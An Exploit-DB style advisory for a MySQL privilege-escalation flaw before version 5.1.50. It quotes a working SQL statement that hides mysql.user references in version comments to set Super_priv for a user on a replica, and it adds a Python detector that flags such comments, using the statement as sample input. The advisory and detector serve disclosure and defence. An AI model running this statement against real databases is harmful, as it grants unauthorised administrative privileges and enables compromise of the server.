Vendor: MySQL Database Server
By: Not specified
CVSS: 7.5 (HIGH)
Remote Privilege Escalation
CWE: 269
Product Name: MySQL Database Server
Affected Version From: Not specified
Affected Version To: MySQL versions prior to 5.1.50
Patch Exists: YES
Related CWE: Not specified
CPE: a:mysql:mysql
Platforms Tested: Not specified

MySQL Remote Privilege Escalation Vulnerability

An attacker can exploit this issue to run arbitrary SQL statements with 'SUPER' privileges on the slave database system, allowing them to compromise the affected database system.

Mitigation:

Upgrade to MySQL version 5.1.50 or later.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/43677/info

MySQL is prone to a remote privilege-escalation vulnerability.

An attacker can exploit this issue to run arbitrary SQL statements with 'SUPER' privileges on the slave database system. This will allow the attacker to compromise the affected database system.

This issue affects versions prior to MySQL 5.1.50. 

UPDATE db1.tbl1 /*!514900 ,mysql.user */
SET db1.tbl1.col1=2 /*!514900 ,mysql.user.Super_priv='Y'
WHERE mysql.user.User='user1'*/;
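
Added example, not part of the Exploit-DB entry: the statement above places its references to mysql.user inside MySQL version comments (/*!NNNNN ... */), which a server executes only when its own version is at least NNNNN. This Python check flags statements whose version comments touch the mysql system schema, for use when reviewing statement text on the way to a replica. The function names and the sample statements are constructed for illustration.

```python
import re

# /*!NNNNN body */ : MySQL executes the body only on servers at or above
# version NNNNN; other servers treat the whole thing as a comment.
VERSIONED_COMMENT = re.compile(r"/\*!(\d+)(.*?)\*/", re.DOTALL)
# A reference to an object in the mysql system schema, e.g. mysql.user.
SYSTEM_SCHEMA_REF = re.compile(r"(?<![\w$])`?mysql`?\s*\.", re.IGNORECASE)


def find_hidden_system_refs(statement):
    """Return (version_digits, body) for every version comment in
    `statement` whose body references the mysql system schema."""
    hits = []
    for match in VERSIONED_COMMENT.finditer(statement):
        digits, body = match.group(1), match.group(2)
        if SYSTEM_SCHEMA_REF.search(body):
            hits.append((digits, body.strip()))
    return hits


def audit(statements):
    """Map statement index -> hits, for statements with at least one hit."""
    report = {}
    for index, statement in enumerate(statements):
        hits = find_hidden_system_refs(statement)
        if hits:
            report[index] = hits
    return report


# Constructed sample input: two ordinary statements and the statement
# quoted on this page.
SAMPLE = [
    "UPDATE db1.tbl1 SET col1=2 WHERE id=7;",
    "CREATE TABLE t (a INT) /*!50100 ENGINE=InnoDB */;",
    "UPDATE db1.tbl1 /*!514900 ,mysql.user */\n"
    "SET db1.tbl1.col1=2 /*!514900 ,mysql.user.Super_priv='Y'\n"
    "WHERE mysql.user.User='user1'*/;",
]

if __name__ == "__main__":
    for index, hits in audit(SAMPLE).items():
        for digits, body in hits:
            print(f"statement {index}: /*!{digits} */ touches mysql.*: {body!r}")
```

This is a text heuristic: it does not parse SQL, so a comment terminator inside a string literal can confuse it, and a benign version comment (such as the ENGINE clause in the sample) is deliberately left unflagged.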